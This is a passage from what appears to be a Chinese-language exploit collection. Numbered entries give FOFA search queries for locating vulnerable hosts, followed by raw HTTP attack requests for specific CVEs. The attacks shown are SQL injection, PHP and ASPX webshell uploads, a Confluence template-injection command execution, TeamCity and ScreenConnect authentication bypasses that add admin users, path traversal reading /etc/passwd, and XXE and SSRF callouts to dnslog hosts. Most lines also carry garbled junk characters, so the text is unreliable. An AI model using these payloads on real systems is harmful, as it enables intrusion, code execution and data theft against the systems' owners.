X-Remote-Addr: 1.1.1.1
. M& l" V8 w+ @5 J6 P2 \, Z5 STe: trailers
( G( s" R; E& W# X: z, i: k- pConnection: close2 I2 v! k& ?" R) r) k, f. p4 f
7 F" s# p: Y" G4 D& d
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
/ R, C5 c" l# G/ h9 h! {
- Y+ f+ l; w+ T5 f( q5 O/ N' J5 h1 f5 J7 L! F
120. 北京百绰智能S40管理平台导入web.php任意文件上传
4 \' }/ u* U7 q( w9 H' LCVE-2024-1253
6 u$ N# y1 P! c7 DFOFA:title="Smart管理平台"
7 J7 |$ y, g/ x: r" SPOST /useratte/web.php? HTTP/1.14 w9 }+ _) R- _
Host: ip:port
" n( n- N6 Y; y1 bCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
. |6 J3 `( z3 h1 H. J) p1 Z3 K3 YUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko. t7 }. K8 ~; b3 h S; M6 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 g4 \3 X% m: T9 Y& F# iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& Q e2 C$ I5 s8 z0 b" D* M9 ], qAccept-Encoding: gzip, deflate
6 P4 N' p! W9 T" ]8 ~ P/ LContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
2 _+ h& c4 ]+ M; ?Content-Length: 597
/ P! w# C& r p4 S1 A% {" D! e( rOrigin: https://ip:port% S. q& M8 W% I& J$ T
Referer: https://ip:port/sysmanage/licence.php9 }) z" i7 m% M2 J: s2 ]4 m; f, E& i
Upgrade-Insecure-Requests: 1
1 p$ U& ?. n4 c6 SSec-Fetch-Dest: document7 [% i, Z; S. u6 N2 x. D' ~
Sec-Fetch-Mode: navigate) E2 J0 A: F: u- ~5 o
Sec-Fetch-Site: same-origin5 R0 ^: R& }) X: e- I0 K! R
Sec-Fetch-User: ?1- T4 R8 w- l' o8 n5 k* G: U
Te: trailers& B- w, b6 k9 y) W
Connection: close. x* w3 }' j: [
* G# t S7 l$ P) S-----------------------------42328904123665875270630079328
$ N8 J5 B6 ~# H( D# i0 e1 oContent-Disposition: form-data; name="file_upload"; filename="2.php"
5 n" y2 m: [$ pContent-Type: application/octet-stream8 U- N0 f( I3 ^6 H7 M8 X
# Z' e [; E+ q9 Z<?php phpinfo()?>
5 ~& @! c% j. W5 W-----------------------------42328904123665875270630079328
" o2 m8 p1 K& p6 y4 b% F, }# tContent-Disposition: form-data; name="id_type"
$ g0 ~" o( d4 C' n- U! s
9 D# I0 E: a5 ^0 r! p" i5 c1" f- ~) U: Y0 |/ R
-----------------------------42328904123665875270630079328* o% i1 F2 {: A5 b8 T. U! C
Content-Disposition: form-data; name="1_ck"
# s( W' h3 C7 i# b- U1 n) h& N/ r; P7 |6 p( i/ R9 A% j
1_radhttp, F/ H2 y" v! U" l$ o, u, j0 A
-----------------------------423289041236658752706300793283 `' |) S8 k, q/ w1 M! s9 j. |! p
Content-Disposition: form-data; name="mode"" a X/ H% E4 p% g
8 v8 A! s t- [$ A* h/ A- J
import
2 m* U" Q. w+ ~ ]& @0 Q. b. G-----------------------------42328904123665875270630079328* K+ j% F/ V t @. c/ H
& G' @" h+ C2 u' e# x x4 r
# V, C8 V; ]8 {4 D7 X- }; A! p
文件路径/upload/2.php
' J. E9 e0 S: [7 H1 @
+ ]1 z# p" F$ v8 L1 i121. 北京百绰智能S42管理平台userattestation.php任意文件上传/ k* Z1 z$ n7 I" c# F
CVE-2024-19184 d" D% ~! E, i; S9 @3 H, g
FOFA:title="Smart管理平台"+ [3 i6 q$ u% q. }$ ]7 z) R
POST /useratte/userattestation.php HTTP/1.1* e4 O, j, o* v* ^1 t) J, y" V
Host: 192.168.40.130:84437 l# ^$ I2 g+ s3 h M3 b/ x" ^
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac505 W/ h- F8 |/ L* W9 g
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
l) l6 v* {; b4 t! V' ?+ hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 j& o2 @8 K5 t5 {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; k V+ s0 D7 ?" b* kAccept-Encoding: gzip, deflate
7 u* L, a: P$ h* B2 D3 Y# @4 q# iContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328$ s) R+ p% d; k/ F6 N5 k
Content-Length: 5929 Z0 a/ P0 k$ Z! F2 R6 m7 [6 f. d
Origin: https://192.168.40.130:8443
o# w# r8 C# o+ b ZUpgrade-Insecure-Requests: 1
8 A! i, E4 _, Y- P7 k( F$ gSec-Fetch-Dest: document
) X8 B3 Y3 c6 I. a& oSec-Fetch-Mode: navigate
@% T4 r. P! s) kSec-Fetch-Site: same-origin
% O7 t. c! P2 [. c3 C2 f; P8 kSec-Fetch-User: ?1
6 Q$ g! r# \5 c) PTe: trailers
! \& \$ S7 T" P# a6 V/ u! iConnection: close
: m/ M8 e: Z6 u& b9 N/ e* y4 P
% k0 N3 M6 ~& U$ R2 |-----------------------------423289041236658752706300793285 Y: @! p; {# X
Content-Disposition: form-data; name="web_img"; filename="1.php"
5 H5 W% Q% E, h d) \; d' x4 DContent-Type: application/octet-stream
# e h; g6 r& J) ]" M2 m% o& l
Q! u6 ^. v0 i<?php phpinfo();?>: W( n( O7 h" F5 O
-----------------------------42328904123665875270630079328
- {7 S4 c" _! b0 r% L+ [5 DContent-Disposition: form-data; name="id_type"
9 O& P9 Z# ?' M1 a7 z& h% U: R& n. o$ X% @
1+ M* b( W8 A4 [/ z: R
-----------------------------42328904123665875270630079328
$ |0 h. M! }0 e) r0 K+ AContent-Disposition: form-data; name="1_ck"# `5 O2 W2 c8 c7 D
( G( t8 f6 N1 G
1_radhttp: K3 a7 X ?, K. \1 \3 q
-----------------------------42328904123665875270630079328
* i' a( u$ {3 H. w: R0 D% I4 YContent-Disposition: form-data; name="hidwel"
, I+ C0 O& u# `! P) X8 b8 g1 b9 o; c
set
! }. q/ K" T+ H/ v' _$ f-----------------------------423289041236658752706300793282 K/ {/ a. A- ^& L! m: h- U& h
4 i$ T5 Y: C/ D: N& B
+ s2 t% N Y5 _" I: c
boot/web/upload/weblogo/1.php9 s0 k- A* x, I
& j6 O2 o1 l, k% J: b* P. R
122. 北京百绰智能s200管理平台/importexport.php sql注入
7 t, w/ [* ^9 B8 e" CCVE-2024-27718FOFA:title="Smart管理平台"
) E9 i9 B }- x8 Y7 u, k/ n其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()8 G9 z! L& U# B' }& B# f* x
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
7 A& H2 a1 q9 s2 z) h m% HHost: x.x.x.x
# b7 O2 G0 V7 Y4 M. wCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
- q0 f b6 S; J" [2 l% QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.07 K" \' b( y8 q% x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! ?/ q' X4 _& k( Z0 F/ j3 P+ ~3 Q/ L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) W+ ]3 ~- V$ G3 \- A! KAccept-Encoding: gzip, deflate, br/ u* M- O) ~, ^9 m$ M* x( b; k: a
Upgrade-Insecure-Requests: 1
u6 }: X, k* H# B% vSec-Fetch-Dest: document3 X w! R3 ?* [# ?2 @. w$ S
Sec-Fetch-Mode: navigate
8 U0 c* u$ I) \; g1 QSec-Fetch-Site: none6 U' B( e0 @4 W- C/ q
Sec-Fetch-User: ?1
, I# n1 ~( {+ t) T/ KTe: trailers0 V1 w+ j) O8 ]; Y
Connection: close/ ^4 a1 x2 X/ X
- D; N& ?% o3 g0 o7 `2 R
% R4 g; j( U+ ^6 F7 F l
123. Atlassian Confluence 模板注入代码执行
3 r* g5 u# {$ u" i: ~FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"$ h/ n/ \' @8 n* U7 D
POST /template/aui/text-inline.vm HTTP/1.15 k) w# y, Z* p, a- f
Host: localhost:8090
( w5 p( `3 d6 GAccept-Encoding: gzip, deflate, br
% s' s: \ y7 B9 l4 R6 o7 Z& FAccept: */*
( r, A, T- G% V( j* ~5 m- hAccept-Language: en-US;q=0.9,en;q=0.8
6 U% ~. d3 r& n& D4 G' MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.368 [6 x/ V3 ?2 ^: X. h% a
Connection: close( }: P' T8 Q; m
Content-Type: application/x-www-form-urlencoded9 \) ~3 ~4 x% M( V( _" s% V5 k6 l! Q
9 z D1 c3 C5 [2 Y$ mlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))2 u% f8 r* E% d# w, q2 y
$ c! `/ V; G) n5 I9 @" C( s
/ s0 d# A2 a& S* M
124. 湖南建研工程质量检测系统任意文件上传
% t7 w4 F& B4 OFOFA:body="/Content/Theme/Standard/webSite/login.css"
1 m4 Q- a" ?' RPOST /Scripts/admintool?type=updatefile HTTP/1.12 T M: {& f" S: @
Host: 192.168.40.130:8282
; m+ x- E* A4 R& ^User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36( Y @8 d* d/ N3 C6 g
Content-Length: 72
( x( c3 v( X9 A A1 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
* K/ t4 ~" U) `7 X5 T) S! s2 `Accept-Encoding: gzip, deflate, br& ` G d+ E) U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 g6 }* L1 b) S+ K" q5 J, K7 m
Connection: close
; p: G S. x1 o$ j0 NContent-Type: application/x-www-form-urlencoded/ p4 ~% N" q0 B+ K6 J3 z6 m5 Z
. n. H, \9 m, z9 J6 h* Q, X/ t
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>7 x5 [, C) ~8 F. r4 i U% P
% n+ ~# L% S2 n' R& _4 ]& m' U8 i2 Z5 h, ]5 o5 l+ t/ J) _
http://192.168.40.130:8282/Scripts/abcgcg.aspx
+ p' r" q1 O: I/ Y0 _- x {0 A
- Z4 O/ W5 n5 C( o! z125. ConnectWise ScreenConnect身份验证绕过
; G0 i% Z' K. b/ O' v$ HCVE-2024-1709% @0 x5 k) B" C7 b
FOFA:icon_hash="-82958153"5 Q: C y% m; _# M3 {
https://github.com/watchtowrlabs ... bypass-add-user-poc0 g8 Q |* _/ V. o& r- e) A
- J4 b$ v4 \! M3 Y- {
# M. N4 w1 C& h. {' i, ^4 D使用方法
" [. l+ P" t; F# r9 Bpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
! [7 h1 H/ V/ f& e
# P k$ _7 V7 p- \1 ]" J+ G7 w- P& I1 v6 k6 o. T7 [* {4 G( h7 s
创建好用户后直接登录后台,可以执行系统命令。
% m, j$ r. l- Y/ n9 ~6 p/ o, K$ N& N: L+ `& L- v; p- p
126. Aiohttp 路径遍历5 j! ^; ^) M2 p G0 b
FOFA:title=="ComfyUI"* z7 e4 b; [ l3 V
GET /static/../../../../../etc/passwd HTTP/1.1
- q( B6 Y' j: o- k1 EHost: x.x.x.x
6 s7 F; N# [& @+ R3 F+ n8 D, fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
: Y4 r/ V0 p# |2 rConnection: close g% \- I! h& z( g
Accept: */*
n. D, Y2 d" o0 L+ `' H" F& f( SAccept-Language: en
8 v. l% P: `! S; l( @Accept-Encoding: gzip
- |( p- ?% @, R4 l5 x" A" ]3 E% I; Z$ K9 d( \
7 D' g+ u2 X0 k- w- x6 E0 Q) \127. 广联达Linkworks DataExchange.ashx XXE S1 B$ H. j6 o$ }0 V0 ^) W
FOFA:body="Services/Identification/login.ashx" " g+ i9 v" u# C* `. [4 o
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
0 d2 n4 {" w1 l; T. r! ^( R2 u$ ]Host: 192.168.40.130:8888. L4 [5 q+ F7 @0 x9 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
& F! R3 g& v8 y* rContent-Length: 415; l/ q/ ?' h l4 e4 u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; W. ~" }. B. B5 S" ]1 L1 Q
Accept-Encoding: gzip, deflate. r9 |1 u- |$ d- D' a5 X
Accept-Language: zh-CN,zh;q=0.9
9 M2 h3 e, {7 [. wConnection: close& V5 F! m4 y- [6 M
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe00 E7 G4 ?$ Q8 c5 d
Purpose: prefetch O/ v) u/ `9 x/ g6 u
Sec-Purpose: prefetch;prerender2 B& s7 T6 b0 R- R, R6 N
+ ~4 B8 u/ v p5 a; B# I, `; i------WebKitFormBoundaryJGgV5l5ta05yAIe0
0 B' g# N4 i' F* D& N' S* h' |8 q' xContent-Disposition: form-data;name="SystemName"; K4 I& v6 W; X' @: I! x: {: Y
9 D8 u4 a% g5 E/ _' ^$ J: b
BIM+ a, [3 Y t! l. L S* g( O
------WebKitFormBoundaryJGgV5l5ta05yAIe0# a+ F( o8 H& ?; ]5 Y& k5 a
Content-Disposition: form-data;name="Params"
! q a5 z4 {- s6 ]; T9 yContent-Type: text/plain$ z: j' A; i' M
1 V( I- Q3 J3 W! |% q
<?xml version="1.0" encoding="UTF-8"?># j% ]/ v9 i! B8 ^4 C4 x# P$ U e: }
<!DOCTYPE test [" b) o3 u: \: d9 W: ^$ ?
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
+ y0 P' W; ~: }, J1 R$ u, y( l]
+ s1 W# m- h) o' O9 G: W0 ^* X> K" `9 @) Y6 C. k
<test>&t;</test>- J& G' ?/ e$ D1 [. k- P% r! W
------WebKitFormBoundaryJGgV5l5ta05yAIe0--) b, }. m6 o# v7 b9 Z
, _: L( o# ~" x
- \* L) v& @2 F$ Q7 D. L/ S/ z) U7 T9 \: h
128. Adobe ColdFusion 反序列化
% f: B% {* a! [ OCVE-2023-38203
0 Y5 h+ K! }- a. mAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
) I) A2 Q4 {' j+ ~, d" Y$ v) NFOFA:app="Adobe-ColdFusion"/ y6 _9 Q% c% \1 w0 i& z" ^* c
PAYLOAD
9 }8 H |7 C5 s5 [8 `9 S: k
! ]% |0 y2 ~, ^0 |129. Adobe ColdFusion 任意文件读取* ^1 D! P6 {/ o, h* Y, H- g" D
CVE-2024-20767( H; t' k3 S# ^; Y. f, m
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
" |7 E4 C) s t/ z: q1 p4 d7 e3 l第一步,获取uuid7 B- U' |* N7 a: ]. g" h/ ^4 s
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
6 r! H4 R' O# w6 r0 Z5 N9 N" E$ y" uHost: x.x.x.x$ U) ?4 p U# h v8 N) m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36( _* b# n/ y6 \ u" W; ~1 L
Accept: */*
4 H+ R6 k2 C4 c- K6 Q- g' B! A- PAccept-Encoding: gzip, deflate
! V% K2 v) S- o. c1 Z6 |9 QConnection: close5 w1 g' i% E+ C( P! h
5 _2 ~# N: U0 E% m+ R* c- R- @( }- O2 i
第二步,读取/etc/passwd文件* B% D2 p2 ~: f3 i, e8 q: h
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1: z! F! R/ m2 k/ }$ `% K7 S6 |5 M
Host: x.x.x.x
5 n3 X0 G* Z' wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+ I- V$ O, D# Z' f6 v' U" D: XAccept: */*# a2 n3 c7 `$ P+ ^$ d
Accept-Encoding: gzip, deflate
{; K: S1 y1 }* J" P- @9 I& d$ uConnection: close- J( X4 A* u" b+ A3 \- c3 p _7 m, A
uuid: 85f60018-a654-4410-a783-f81cbd5000b99 e: R# D- e+ A
+ `: x% M8 u2 r6 N5 U" A. {; l; b) o0 M7 G! o' E6 G1 F4 s G" Z2 T# s
130. Laykefu客服系统任意文件上传
, w1 f' U" m+ s8 K9 a2 s7 LFOFA:icon_hash="-334624619"$ H+ [* Z" H, e! y
POST /admin/users/upavatar.html HTTP/1.1! [. C: w6 e. d1 h/ u0 _0 L
Host: 127.0.0.1# J! b6 A4 Q" v: r9 S
Accept: application/json, text/javascript, */*; q=0.01/ k9 j- Y7 }& @9 h# @
X-Requested-With: XMLHttpRequest
/ s! `! z& i, B1 rUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.262 s$ V0 F) @- ?5 V: |4 Q
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
* ^3 A7 |. t' p y1 Y. dAccept-Encoding: gzip, deflate+ o$ u2 H+ H% y% L ?: J3 O
Accept-Language: zh-CN,zh;q=0.9. m& r; ~* S" u* f# V; F* W
Cookie: user_name=1; user_id=36 y7 j+ H7 w5 h6 i k3 I% L# C
Connection: close) Q0 `$ J% c: ^' D1 z& O* x
0 ] s* M/ x+ d- [9 w
------WebKitFormBoundary3OCVBiwBVsNuB2kR
( U! H6 c& R% }! i2 e! p* TContent-Disposition: form-data; name="file"; filename="1.php"
' j O9 _# t& tContent-Type: image/png, y- Z. d% c5 P J8 @# ]+ F
& b5 g7 e4 D+ f<?php phpinfo();@eval($_POST['sec']);?>
7 ~9 n: _) q, a l9 r+ E" v------WebKitFormBoundary3OCVBiwBVsNuB2kR--' H$ f7 B! v5 |
( R6 o ]+ V1 _% J% e; P
% M) G6 o; D6 O) d! z6 h# L( o, H0 ~4 L131. Mini-Tmall <=20231017 SQL注入9 q, W/ T) s+ n# D' W |
FOFA:icon_hash="-2087517259"
! Q" s) w5 }6 g" ~后台地址:http://localhost:8080/tmall/admin" L- c: ~* l' O B) P* F5 x# o5 K
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0) ~1 U/ b3 B8 k4 j5 v: k; u
4 x! B$ u% j5 `3 I9 o$ W l
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过; P6 {& Y( M4 Y+ }
CVE-2024-27198+ O" c# `6 {' [$ V& O! ^# `) }. {
FOFA:body="Log in to TeamCity"0 {: C. O( A) H& l. l4 O. o
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
: C" |% P- a0 o OHost: 192.168.40.130:8111
$ @1 i1 f- r, G# t4 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36# S; D" `) s* L8 n& x9 J- ~7 f! ^
Accept: */*) W5 j& f! _9 O2 A$ e
Content-Type: application/json% b8 }6 z; g: ]7 n: L- p
Accept-Encoding: gzip, deflate
3 D9 g3 I, r9 P* q' G5 l7 B( a7 ^4 B9 s, ~ k/ q, h
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}% |7 L4 B4 O, Q4 j- M ?! I( ]( V$ P
9 n0 v; A0 }0 W; `
$ C/ k' n2 ~8 E& w% H1 l9 I
CVE-2024-27199) j6 ]& T- }/ @. N; h
/res/../admin/diagnostic.jsp
# M6 [5 s" P4 o2 y9 r# L; Q/.well-known/acme-challenge/../../admin/diagnostic.jsp4 l8 p, W/ O$ Z, x* E' W8 W5 ^
/update/../admin/diagnostic.jsp8 N! E( q4 V0 i0 w6 ?$ `: Q4 u+ X
- L! h% ]: D/ k a g( L& s) j% c: i5 _; X) ]. S6 l
CVE-2024-27198-RCE.py
* r4 H& D8 i3 R, h: e7 v9 G7 L# g6 M. [
133. H5 云商城 file.php 文件上传
$ }$ y; ^0 H& g' eFOFA:body="/public/qbsp.php"
' T/ Z6 [0 T# U' [POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
7 Y7 p6 d4 o9 r, `6 y& jHost: your-ip
; A. u0 x8 Z5 ?- M$ t1 |' ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.363 E; S& N) g6 t* h
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx; _' ^% N* Z d! _
% \ y4 S, {- L3 I/ ]------WebKitFormBoundaryFQqYtrIWb8iBxUCx
% W) L4 B" k8 Q$ aContent-Disposition: form-data; name="file"; filename="rce.php"" E. g8 ?1 ^1 e `: B- L# [' Y
Content-Type: application/octet-stream
( n( [/ q) b% y+ Z- T
9 D/ h! S8 L# Z2 F: {<?php system("cat /etc/passwd");unlink(__FILE__);?>3 L6 p+ Z4 H! k0 E$ r# x6 q
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--+ m* V& @, g! w5 W4 }
0 G9 H2 d `1 a& Y
) B9 O/ c! m) @1 k' ?, q) C4 ?% O* V, A3 o* m. }
134. 网康NS-ASG应用安全网关index.php sql注入
9 Y; b3 e0 {0 q6 j) YCVE-2024-23305 h2 [3 B. W0 ^8 E
Netentsec NS-ASG Application Security Gateway 6.3版本& T }5 x4 l \8 F" K" t. r
FOFA:app="网康科技-NS-ASG安全网关"
6 w: Y, n- S* n6 hPOST /protocol/index.php HTTP/1.1
! Q3 O! A7 y$ @7 q& a% BHost: x.x.x.x
& L/ D* ]8 _! gCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
) v/ }/ e% ~! z9 sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
( ~1 Y9 j5 \7 ?! L& k8 H% tAccept: */*
7 Q: P1 C% E* q- VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* Q2 C# X1 O3 s3 ]! k1 c
Accept-Encoding: gzip, deflate% E5 a5 w! [4 Y9 f$ H: m8 D
Sec-Fetch-Dest: empty
6 P9 y9 O: O/ [0 R, V6 E0 bSec-Fetch-Mode: cors3 o5 ?8 e( p5 ~" ?( n
Sec-Fetch-Site: same-origin( e8 }4 b7 d$ q
Te: trailers& S# t' |. U/ l i' p
Connection: close
" t T9 ^) e+ M+ }0 W: rContent-Type: application/x-www-form-urlencoded# @* [1 L, X/ [- r+ j* z9 D5 v
Content-Length: 263
; O- e7 z! S: N: v
7 O% t4 v' x+ i3 Ljsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
2 R' P1 i' [. d% l% R! ~' u- n! R U) d# n+ P
7 y) E" a& z- W' \) ^
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
# `& m8 ^0 p6 M4 YCVE-2024-20221 |" d6 q9 f7 y+ h I
Netentsec NS-ASG Application Security Gateway 6.3版本0 i5 }' G0 o" W, _+ M, ~
FOFA:app="网康科技-NS-ASG安全网关"
. I. Y1 C2 G5 J+ R& ?GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1' k5 ^0 O# {! T
Host: x.x.x.x. a4 v% j- J5 n) q8 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 {! t# K& v$ f+ o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 S" X0 b7 b7 ?9 q; ]; H' d+ n
Accept-Encoding: gzip, deflate
$ S* F ~" w; d4 EAccept-Language: zh-CN,zh;q=0.9
7 Y( |) O8 H- n3 w) Y* IConnection: close
, ?2 f9 F& K3 N5 J# }! R( K% J* W+ Q5 g; X c" B) w
2 m1 I1 ~3 w/ a* z& ^136. NextChat cors SSRF
1 C: g7 B$ i5 {% O$ V0 n, \8 QCVE-2023-497855 b' ^ N/ q" b* @
FOFA:title="NextChat"
6 S& B. p8 m8 v5 KGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1 _0 @7 V* P# e K. R
Host: x.x.x.x:10000, g9 g( V5 V5 b$ ~4 j. C+ Q) v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
* n6 A& M& o# iConnection: close
! }+ @# E/ B1 a; r( M! ^1 c8 hAccept: */*- ]6 P, C. n- }, K" O M
Accept-Language: en R. M9 L8 {+ u* C
Accept-Encoding: gzip# C+ x8 f. a0 i, q4 u/ w# w' b
( U0 H- y! V0 a$ G( @/ s3 g/ _2 j4 K
137. 福建科立迅通信指挥调度平台down_file.php sql注入
" V* v8 [: n! K% q0 f' t* K3 kCVE-2024-2620
+ I* m' k/ B! ~4 `. o* }( m4 CFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
5 d" M3 n' c+ D# cGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.14 S, N4 l! m- w* n9 p; {) W
Host: x.x.x.x
}' V0 H0 ]6 h2 H0 A+ b7 V9 g: uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0, [5 Q! l: U6 f! B+ h" ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 L5 u) Q* P( b1 k. k9 H) k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' H4 p& F" m7 _5 mAccept-Encoding: gzip, deflate, br. x- h2 L6 h- |* q
Connection: close
# g' I+ r# M5 M; I" e- {* o: q7 C# {Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj* D- R' P! n% b' q$ \9 F
Upgrade-Insecure-Requests: 1
+ M3 ]5 d* H! s: ^4 U; `7 C, p
1 P. S: K" o1 ]- t138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
, V$ f! _, @3 R: k2 Q7 e6 gCVE-2024-26210 {; m8 c( s! F L+ c& |& @* Q* h1 @
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
7 i1 |6 R1 }1 |0 t& F' t1 {GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1# E1 }& `. A0 s2 V
Host: x.x.x.x
* Y/ C | Z! Y5 Z3 a' C E. o. }* yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
$ h+ a3 r. I1 m: i( q; f4 YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. s0 v% X* @- M+ x2 M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! n6 z0 c+ [% ?8 x
Accept-Encoding: gzip, deflate, br
- r$ p, \" y; K3 d2 DConnection: close
8 M$ }# f3 S" [4 Y: L: JUpgrade-Insecure-Requests: 1
; h4 y' |0 S. A# G4 Q
$ O+ P6 m# b3 ~4 g( j. u- Y" S2 ?2 z2 f' U* G
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
9 B1 m; }6 V* X- ECVE-2024-2622
